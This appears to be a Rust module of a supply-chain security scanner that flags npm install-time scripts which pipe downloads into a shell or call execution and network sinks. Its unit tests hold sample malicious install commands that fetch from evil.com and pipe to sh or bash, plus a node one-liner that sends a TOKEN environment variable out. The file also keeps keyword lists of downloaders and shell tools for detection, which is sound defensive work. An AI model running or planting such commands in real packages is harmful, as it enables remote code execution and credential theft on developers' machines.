use std::collections::HashMap;
use std::path::Path;
use crate::error::Result;
use crate::ir::{EdgeKind, NodeKind, TaintGraph};
/// The `scripts` table extracted from a package.json manifest.
#[derive(Debug, Default)]
pub struct PackageScripts {
    /// Script name (e.g. "postinstall") mapped to its shell command line.
    /// Non-string values in the manifest are skipped during parsing.
    pub scripts: HashMap<String, String>,
}
impl PackageScripts {
pub fn from_json(json: &str) -> Result<Self> {
let raw: serde_json::Value = serde_json::from_str(json)
.map_err(|e| crate::error::Error::Analysis(format!("package.json parse error: {}", e)))?;
let mut scripts = HashMap::new();
if let Some(obj) = raw.get("scripts").and_then(|v| v.as_object()) {
for (k, v) in obj {
if let Some(s) = v.as_str() {
scripts.insert(k.clone(), s.to_string());
}
}
}
Ok(Self { scripts })
}
pub fn from_file(path: &Path) -> Result<Self> {
let content = std::fs::read_to_string(path)
.map_err(|e| crate::error::Error::Io(e))?;
Self::from_json(&content)
}
}
/// Script names that package managers run automatically during install,
/// making them the lifecycle hooks analyzed for taint below.
const AUTO_EXECUTING_SCRIPTS: &[&str] = &["preinstall", "postinstall", "install"];
/// Reports whether `needle` occurs in `haystack` as a whole word.
///
/// A word boundary is the string edge or any byte that is not an ASCII
/// alphanumeric or underscore (mirroring regex `\b` semantics), so "sh"
/// matches in "run.sh" and "curl | sh" but not in "bash" or "npm_sh".
/// Matching is byte-oriented and case-sensitive; callers lowercase first.
fn matches_word_boundary(haystack: &str, needle: &str) -> bool {
    // An empty needle cannot form a meaningful word match.
    if needle.is_empty() {
        return false;
    }
    // `_` joins words in identifiers, so it must not act as a boundary.
    let is_word_byte = |b: u8| b.is_ascii_alphanumeric() || b == b'_';
    let bytes = haystack.as_bytes();
    for (i, _) in haystack.match_indices(needle) {
        let boundary_before = i == 0 || !is_word_byte(bytes[i - 1]);
        let end = i + needle.len();
        let boundary_after = end >= haystack.len() || !is_word_byte(bytes[end]);
        if boundary_before && boundary_after {
            return true;
        }
    }
    false
}
/// Returns true when the (case-insensitively matched) script line mentions
/// a known downloader or interpreter — curl, wget, node, sh, bash — as a
/// stand-alone word.
fn has_shell_command(value: &str) -> bool {
    let lower = value.to_ascii_lowercase();
    for cmd in &["curl", "wget", "node", "sh", "bash"] {
        if matches_word_boundary(&lower, cmd) {
            return true;
        }
    }
    false
}
/// Scans a script command line for shell execution sinks.
///
/// Returns zero or more of "shell:sh", "shell:bash", "shell:eval" and
/// "shell:exec", always in that fixed order. `sh`/`bash` are flagged when
/// piped into or invoked as a command word; `eval`/`exec` are flagged when
/// invoked as a command word or called with `(`.
fn detect_shell_sinks(value: &str) -> Vec<&'static str> {
    let lower = value.to_ascii_lowercase();
    // `cmd` receives piped input or appears as an invoked command word.
    let piped_or_run = |cmd: &str| {
        lower.contains(&format!("| {}", cmd))
            || lower.contains(&format!("|{}", cmd))
            || lower.contains(&format!(";{}", cmd))
            || lower.starts_with(&format!("{} ", cmd))
            || lower.contains(&format!(" {} ", cmd))
            || lower.contains(&format!("\t{} ", cmd))
            || lower.contains(&format!("\n{} ", cmd))
    };
    // `kw` is called as a builtin/function: `kw(...)` or `kw arg`.
    let invoked = |kw: &str| {
        lower.contains(&format!("{}(", kw))
            || lower.starts_with(&format!("{} ", kw))
            || lower.contains(&format!(" {} ", kw))
            || lower.contains(&format!(";{} ", kw))
            || lower.contains(&format!("\t{} ", kw))
            || lower.contains(&format!("\n{} ", kw))
    };
    let mut sinks = Vec::new();
    if piped_or_run("sh") {
        sinks.push("shell:sh");
    }
    if piped_or_run("bash") {
        sinks.push("shell:bash");
    }
    if invoked("eval") {
        sinks.push("shell:eval");
    }
    if invoked("exec") {
        sinks.push("shell:exec");
    }
    sinks
}
fn detect_js_sinks(value: &str) -> Vec<&'static str> {
let lower = value.to_ascii_lowercase();
let mut sinks = Vec::new();
if matches_word_boundary(&lower, "fetch")
|| matches_word_boundary(&lower, "xmlhttprequest")
|| matches_word_boundary(&lower, "websocket")
{
sinks.push("fetch");
}
if matches_word_boundary(&lower, "eval") {
sinks.push("eval");
}
if matches_word_boundary(&lower, "function") {
sinks.push("Function");
}
if lower.contains("child_process.exec") || lower.contains("child_process.execsync") {
sinks.push("child_process.exec");
}
if lower.contains("child_process.spawn") || lower.contains("child_process.spawnsync") {
sinks.push("child_process.spawn");
}
if lower.contains("child_process.execfile") {
sinks.push("child_process.execFile");
}
if lower.contains("child_process.fork") {
sinks.push("child_process.fork");
}
if lower.contains("http.request") || lower.contains("https.request") {
sinks.push("http.request");
sinks.push("https.request");
}
if lower.contains("http.get") || lower.contains("https.get") {
sinks.push("http.get");
sinks.push("https.get");
}
if lower.contains("net.connect") || lower.contains("net.createconnection") {
sinks.push("net.connect");
}
if lower.contains("dns.lookup") {
sinks.push("dns.lookup");
}
if matches_word_boundary(&lower, "settimeout") {
sinks.push("setTimeout");
}
if matches_word_boundary(&lower, "setinterval") {
sinks.push("setInterval");
}
if matches_word_boundary(&lower, "setimmediate") {
sinks.push("setImmediate");
}
if lower.contains("process.nexttick") {
sinks.push("process.nextTick");
}
sinks.sort();
sinks.dedup();
sinks
}
/// Adds taint nodes and edges for suspicious auto-executing package.json
/// scripts to `graph`.
///
/// Only scripts named in [`AUTO_EXECUTING_SCRIPTS`] are considered; a script
/// contributes nodes only when it both invokes a shell command and contains
/// at least one shell or JS sink. The script name becomes a `Variable` source
/// node and each detected sink becomes a `Call` node linked by an `Argument`
/// edge.
///
/// # Errors
/// Propagates the parse error from [`PackageScripts::from_json`].
pub fn populate_package_json_graph(source: &str, graph: &mut TaintGraph) -> Result<()> {
    let scripts = PackageScripts::from_json(source)?;
    for (name, value) in &scripts.scripts {
        let auto_executing = AUTO_EXECUTING_SCRIPTS.contains(&name.as_str());
        if !auto_executing {
            continue;
        }
        let shell_sinks = detect_shell_sinks(value);
        let js_sinks = detect_js_sinks(value);
        let any_sink = !shell_sinks.is_empty() || !js_sinks.is_empty();
        if !any_sink || !has_shell_command(value) {
            continue;
        }
        let source_id = graph.add_node(NodeKind::Variable, name.clone(), None);
        // Shell sinks first, then JS sinks, matching detection order.
        for sink_name in shell_sinks.into_iter().chain(js_sinks) {
            let sink_id = graph.add_node(NodeKind::Call, sink_name.to_string(), None);
            graph.add_edge(source_id, sink_id, EdgeKind::Argument);
        }
    }
    Ok(())
}
/// Builds a fresh taint graph from a package.json string.
///
/// # Errors
/// Propagates any error from [`populate_package_json_graph`].
pub fn parse_package_json(source: &str) -> Result<TaintGraph> {
    let mut graph = TaintGraph::new();
    populate_package_json_graph(source, &mut graph).map(|()| graph)
}
pub fn parse_package_json_file(path: &Path) -> Result<TaintGraph> {
let source = std::fs::read_to_string(path)
.map_err(|e| crate::error::Error::Io(e))?;
parse_package_json(&source)
}
#[cfg(test)]
mod tests {
    use super::*;

    // A manifest with no `scripts` key yields an empty graph.
    #[test]
    fn parse_empty_package_json() {
        let graph = parse_package_json(r#"{"name":"test"}"#).unwrap();
        assert_eq!(graph.node_count(), 0);
    }

    // Benign build/test scripts contain no sinks, so no nodes are created.
    #[test]
    fn parse_scripts_no_taint() {
        let json = r#"{"scripts":{"build":"tsc","test":"jest"}}"#;
        let graph = parse_package_json(json).unwrap();
        assert_eq!(graph.node_count(), 0);
    }

    // curl piped to sh in postinstall: one source node + one shell:sh sink.
    #[test]
    fn parse_postinstall_pipe_to_sh() {
        let json = r#"{"scripts":{"postinstall":"curl evil.com | sh"}}"#;
        let graph = parse_package_json(json).unwrap();
        assert_eq!(graph.node_count(), 2);
        let sources: Vec<_> = graph
            .nodes()
            .iter()
            .filter(|n| n.name == "postinstall")
            .collect();
        assert_eq!(sources.len(), 1);
        let sinks: Vec<_> = graph
            .nodes()
            .iter()
            .filter(|n| n.name == "shell:sh")
            .collect();
        assert_eq!(sinks.len(), 1);
    }

    // bash invocation plus eval( call: source + two shell sinks = 3 nodes.
    #[test]
    fn parse_preinstall_bash_and_eval() {
        let json = r#"{"scripts":{"preinstall":"bash -c 'eval(node malicious.js)'"}}"#;
        let graph = parse_package_json(json).unwrap();
        assert_eq!(graph.node_count(), 3);
        let bash_sinks: Vec<_> = graph
            .nodes()
            .iter()
            .filter(|n| n.name == "shell:bash")
            .collect();
        assert_eq!(bash_sinks.len(), 1);
        let eval_sinks: Vec<_> = graph
            .nodes()
            .iter()
            .filter(|n| n.name == "shell:eval")
            .collect();
        assert_eq!(eval_sinks.len(), 1);
    }

    // Pipe-to-bash and `; exec` in the same install script each get a sink.
    #[test]
    fn parse_install_wget_exec() {
        let json = r#"{"scripts":{"install":"wget http://evil.com/run.sh -O- | bash; exec node payload.js"}}"#;
        let graph = parse_package_json(json).unwrap();
        let bash_sinks: Vec<_> = graph
            .nodes()
            .iter()
            .filter(|n| n.name == "shell:bash")
            .collect();
        assert_eq!(bash_sinks.len(), 1);
        let exec_sinks: Vec<_> = graph
            .nodes()
            .iter()
            .filter(|n| n.name == "shell:exec")
            .collect();
        assert_eq!(exec_sinks.len(), 1);
    }

    // The same dangerous pattern in a non-lifecycle script is ignored.
    #[test]
    fn non_auto_script_ignored() {
        let json = r#"{"scripts":{"build":"curl evil.com | sh"}}"#;
        let graph = parse_package_json(json).unwrap();
        assert_eq!(graph.node_count(), 0);
    }

    // Without a recognized shell command the script produces no nodes.
    #[test]
    fn no_shell_command_no_nodes() {
        let json = r#"{"scripts":{"postinstall":"echo hello"}}"#;
        let graph = parse_package_json(json).unwrap();
        assert_eq!(graph.node_count(), 0);
    }

    // Invalid JSON must surface as an error, not a silent empty graph.
    #[test]
    fn adversarial_malformed_json() {
        let result = parse_package_json("not json at all");
        assert!(result.is_err(), "Malformed JSON must return an error");
    }

    // An explicitly empty scripts object yields no nodes.
    #[test]
    fn adversarial_empty_scripts() {
        let graph = parse_package_json(r#"{"scripts":{}}"#).unwrap();
        assert_eq!(graph.node_count(), 0);
    }

    // A manifest missing the scripts key entirely yields no nodes.
    #[test]
    fn adversarial_missing_scripts() {
        let graph = parse_package_json(r#"{"name":"x"}"#).unwrap();
        assert_eq!(graph.node_count(), 0);
    }

    // "bash script.sh" — bash is invoked directly, so it must be flagged.
    #[test]
    fn word_boundary_sh_does_not_match_bash() {
        let json = r#"{"scripts":{"postinstall":"bash script.sh"}}"#;
        let graph = parse_package_json(json).unwrap();
        let has_bash_sink = graph.nodes().iter().any(|n| n.name == "shell:bash");
        assert!(has_bash_sink, "bash should be detected as a sink");
    }

    // JS-level sink (fetch) inside a node -e one-liner: source + fetch node.
    #[test]
    fn parse_postinstall_node_fetch() {
        let json = r#"{"scripts":{"postinstall":"node -e 'fetch(process.env.TOKEN)'"}}"#;
        let graph = parse_package_json(json).unwrap();
        assert_eq!(graph.node_count(), 2);
        let has_postinstall = graph.nodes().iter().any(|n| n.name == "postinstall");
        let has_fetch = graph.nodes().iter().any(|n| n.name == "fetch");
        assert!(has_postinstall, "expected postinstall source node");
        assert!(has_fetch, "expected fetch sink node");
    }

    // 100 threads parse the same manifest concurrently; the parser holds no
    // shared mutable state, so every thread must see the same 4-node result.
    #[test]
    fn concurrent_access_stress() {
        let json = r#"{"scripts":{"postinstall":"curl evil.com | sh","preinstall":"node x.js | bash"}}"#;
        let mut handles = Vec::new();
        for _ in 0..100 {
            let json = json.to_string();
            handles.push(std::thread::spawn(move || {
                let graph = parse_package_json(&json).unwrap();
                assert_eq!(graph.node_count(), 4);
            }));
        }
        for h in handles {
            h.join().unwrap();
        }
    }
}